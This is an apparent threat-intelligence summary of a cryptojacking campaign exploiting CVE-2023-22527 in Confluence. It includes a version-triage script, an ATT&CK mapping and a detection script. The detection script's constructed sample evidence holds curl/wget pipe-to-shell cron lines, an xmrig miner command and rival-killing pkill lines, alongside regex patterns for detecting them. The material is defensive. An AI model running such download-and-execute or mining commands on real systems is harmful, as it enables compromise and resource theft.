Cryptojacking Campaign Exploits CVE-2023-22527 in Atlassian Confluence

On August 28, 2024, Trend Micro released a report detailing the exploitation of CVE-2023-22527, a critical vulnerability in Atlassian Confluence. This vulnerability, initially disclosed on January 16, 2024, affects Confluence Data Center and Confluence Server.


Introduction

On August 28, 2024, Trend Micro released a report detailing the exploitation of CVE-2023-22527, a critical vulnerability in Atlassian Confluence. This vulnerability, initially disclosed on January 16, 2024, affects the Confluence Data Center and Confluence Server. The report highlights how threat actors are actively exploiting this vulnerability to deploy crypto-mining software across compromised environments, effectively turning them into crypto-mining networks.

Report Overview

The vulnerability, present in multiple releases of Confluence Data Center and Server, is a template injection flaw: an unauthenticated attacker can inject a template expression that is evaluated server-side and thereby execute arbitrary code, giving full control of the affected instance. The affected releases are Confluence Data Center and Server 8.0.x through 8.5.3.

Table 1: Affected Confluence Data Center and Server Versions

Product                   Affected Versions
Confluence Data Center    8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
Confluence Server         8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
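A small inventory check against the ranges in Table 1 is a practical first step, since the affected range is contiguous (8.0.0 through 8.5.3) and version strings in asset inventories are often incomplete. The following is an added example, not code from Atlassian or the Trend Micro report; the hostnames and versions in the inventory are constructed, and a version outside the table's ranges is reported only as "outside the Table 1 ranges", not as known safe, because the table says nothing about other release lines.

```python
import re
from typing import Optional

# Inclusive (low, high) version ranges taken from Table 1: 8.0.x through 8.5.3.
AFFECTED_RANGES = [((8, 0, 0), (8, 5, 3))]

# Accepts "8.5.3", "8.4", "v8.5.3", and tolerates trailing suffixes such as "-beta".
_VERSION = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[tuple[int, int, int]]:
    """'8.5.3' -> (8, 5, 3); '8.4' -> (8, 4, 0); None if it is not a dotted version."""
    m = _VERSION.match(text)
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_affected(version: str) -> Optional[bool]:
    """True inside an affected range, False outside it, None if unparseable."""
    v = parse_version(version)
    if v is None:
        return None
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


# Constructed inventory for the example (hostnames and versions are made up).
INVENTORY = {
    "wiki-prod": "8.5.3",
    "wiki-stage": "8.5.4",
    "wiki-new": "8.6.0",
    "wiki-legacy": "7.19.17",
    "wiki-dev": "8.2",
    "wiki-unknown": "latest",
}


def triage(inventory: dict[str, str]) -> dict[str, str]:
    """Map each host to a verdict string based on Table 1."""
    verdicts = {}
    for host, version in inventory.items():
        status = is_affected(version)
        if status is None:
            verdicts[host] = "unparseable version, check manually"
        elif status:
            verdicts[host] = "AFFECTED by CVE-2023-22527: upgrade"
        else:
            verdicts[host] = "outside the Table 1 ranges"
    return verdicts


if __name__ == "__main__":
    for host, verdict in triage(INVENTORY).items():
        print(f"{host:14} {INVENTORY[host]:10} {verdict}")
```

A bare "8.2" is treated as 8.2.0 and therefore affected, which is the conservative reading for an inventory entry that omits the patch level.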

Trend Micro observed three distinct threat actors exploiting the vulnerability to deploy cryptomining scripts that consume the computing resources of the compromised systems:

  1. First Threat Actor: drops an ELF payload that runs XMRig, a widely used open-source Monero miner.
  2. Second Threat Actor: runs a shell script targeting Linux systems and pushes it to further endpoints over SSH. The script kills competing cryptomining processes, deletes existing cron jobs, and installs new cron jobs to maintain persistence.
  3. Third Threat Actor: disables cloud-based security services and exfiltrates SSH credentials, which are then used to spread the mining operation further across the network.
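The behaviours attributed to the second and third actors above (cron-based persistence, eviction of rival miners, miners running from temporary or hidden paths) are the kind of post-exploitation evidence a responder can look for on a Confluence host. The script below is an added example, not code from the Trend Micro report or from Atlassian: it applies a few heuristic rules to a crontab dump and a process listing, both constructed here. The indicator strings, thresholds and paths are assumptions for illustration, not IOCs from the report (which provides none), and 198.51.100.0/24 is a documentation address range.

```python
import re
from dataclasses import dataclass

# Constructed sample evidence (not from the Trend Micro report): a crontab dump
# and a `ps` listing as a responder might collect them from a suspect host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /opt/atlassian/confluence/bin/backup.sh
*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh
@reboot wget -q -O- http://198.51.100.7/up.sh | bash
* * * * * /tmp/.x/.r.sh >/dev/null 2>&1
"""

SAMPLE_PS = """\
USER PID %CPU COMMAND
confluence 1201 3.0 /opt/atlassian/confluence/jre/bin/java -Dconfluence.home=/var/atlassian
root 2210 98.5 /tmp/.x/xmrig -o pool.invalid:3333 -u WALLET_PLACEHOLDER --tls
root 2400 95.0 /dev/shm/.c/sysd --config=/dev/shm/.c/c.json
root 2311 0.0 /bin/sh -c pkill -f minerA; pkill -f minerB; killall -9 rivalmine
"""

# Heuristics (assumptions, not report IOCs):
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")   # fetch-and-pipe-to-shell
MINER_HINT = re.compile(r"xmrig|stratum\+tcp://|--donate-level", re.IGNORECASE)
SUSPICIOUS_PATH = re.compile(r"^(/tmp/|/var/tmp/|/dev/shm/|\S*/\.[^/\s]+/)")  # temp or hidden dir
MASS_KILL = re.compile(r"\b(pkill|killall)\b")
CPU_THRESHOLD = 80.0  # a miner pins a core; the Confluence JVM rarely sits this high


@dataclass
class Finding:
    source: str
    rule: str
    evidence: str


def cron_command(line: str) -> str:
    """Return the command part of a crontab line, handling @reboot-style entries."""
    if line.startswith("@"):
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else ""
    parts = line.split(None, 5)
    return parts[5] if len(parts) == 6 else ""


def scan_crontab(text: str) -> list[Finding]:
    """Flag cron entries that fetch-and-execute or run from a temp/hidden path."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cmd = cron_command(line)
        if DOWNLOAD_EXEC.search(cmd):
            findings.append(Finding("crontab", "download-and-execute", line))
        elif SUSPICIOUS_PATH.match(cmd):
            findings.append(Finding("crontab", "runs-from-temp-or-hidden-path", line))
    return findings


def scan_processes(text: str) -> list[Finding]:
    """Flag miner signatures, hot processes in odd paths, and rival-killing one-liners."""
    findings = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        _user, _pid, cpu, cmd = parts
        try:
            cpu_pct = float(cpu)
        except ValueError:
            continue
        if MINER_HINT.search(cmd):
            findings.append(Finding("ps", "miner-signature", cmd))
        elif SUSPICIOUS_PATH.match(cmd) and cpu_pct >= CPU_THRESHOLD:
            findings.append(Finding("ps", "high-cpu-from-temp-or-hidden-path", cmd))
        if len(MASS_KILL.findall(cmd)) >= 2:  # two or more kills in one command
            findings.append(Finding("ps", "mass-kill-of-rival-processes", cmd))
    return findings


def triage(crontab_text: str, ps_text: str) -> list[Finding]:
    return scan_crontab(crontab_text) + scan_processes(ps_text)


if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PS):
        print(f"[{f.source}] {f.rule}: {f.evidence}")
```

The rules are deliberately coarse; a legitimate deployment script that pipes curl into sh will also trip the first one, so each finding is a lead for a human to confirm, not a verdict. Collecting the inputs with `crontab -l` for every user plus `/etc/cron*` and `ps -eo user,pid,pcpu,args` keeps the parsing above valid.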

The exploitation of CVE-2023-22527 poses significant risks to organizations that rely on Confluence. Once compromised, affected systems become part of a larger crypto mining network, leading to degraded performance, increased energy consumption, and potential exposure to further security breaches. The unauthorized use of computing resources for crypto mining can result in substantial financial losses and operational disruptions.

Insights and Analysis

Trend Micro's primary recommendation is to upgrade: Atlassian's January 2024 advisory shipped fixes in 8.5.4 (the 8.5 LTS line) and in 8.6.0 and later, and an instance on any release in Table 1 remains exploitable until it is moved to a fixed version. Because the flaw had been exploited in the wild for months before this report, an instance that was reachable from the internet while vulnerable should be treated as potentially compromised and checked for the persistence and mining behaviour described above, not just patched. Network segmentation and regular vulnerability assessments reduce the blast radius of the next vulnerability of this kind.

To safeguard against the ongoing exploitation of CVE-2023-22527, organizations should:

  1. Regularly update and patch Confluence instances to the latest available versions.
  2. Isolate critical systems from the broader network to limit the spread of potential attacks.
  3. Conduct regular security audits and vulnerability assessments to identify and address weaknesses.
  4. Develop and maintain an incident response plan to swiftly address any security breaches.

Taken together, these measures significantly reduce an organization's exposure to cryptojacking campaigns and to the follow-on intrusions that a compromised Confluence instance invites.

Indicators of Compromise (IOCs)

No specific Indicators of Compromise (IOCs) were provided in the source material.

MITRE ATT&CK Framework Mapping

Tactic             Technique                                        ID         Description
Initial Access     Exploit Public-Facing Application                T1190      Unauthenticated template injection against an exposed Confluence instance (CVE-2023-22527).
Execution          Command and Scripting Interpreter: Unix Shell    T1059.004  Shell scripts run the miner and the cleanup logic on Linux hosts.
Persistence        Scheduled Task/Job: Cron                         T1053.003  Existing cron jobs deleted and new ones installed to keep the miner running.
Credential Access  Unsecured Credentials                            T1552      SSH credentials collected from the compromised host (third actor).
Lateral Movement   Remote Services: SSH                             T1021.004  Mining script pushed to further endpoints over SSH (second actor).
Defense Evasion    Impair Defenses: Disable or Modify Tools         T1562.001  Cloud-based security services disabled (third actor).
Impact             Resource Hijacking                               T1496      CPU of compromised systems consumed by cryptomining.

References

Trend Micro Research (August 28, 2024). "Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem." Technical analysis of how CVE-2023-22527 is exploited by malicious actors for cryptojacking attacks that spread across the victim's systems.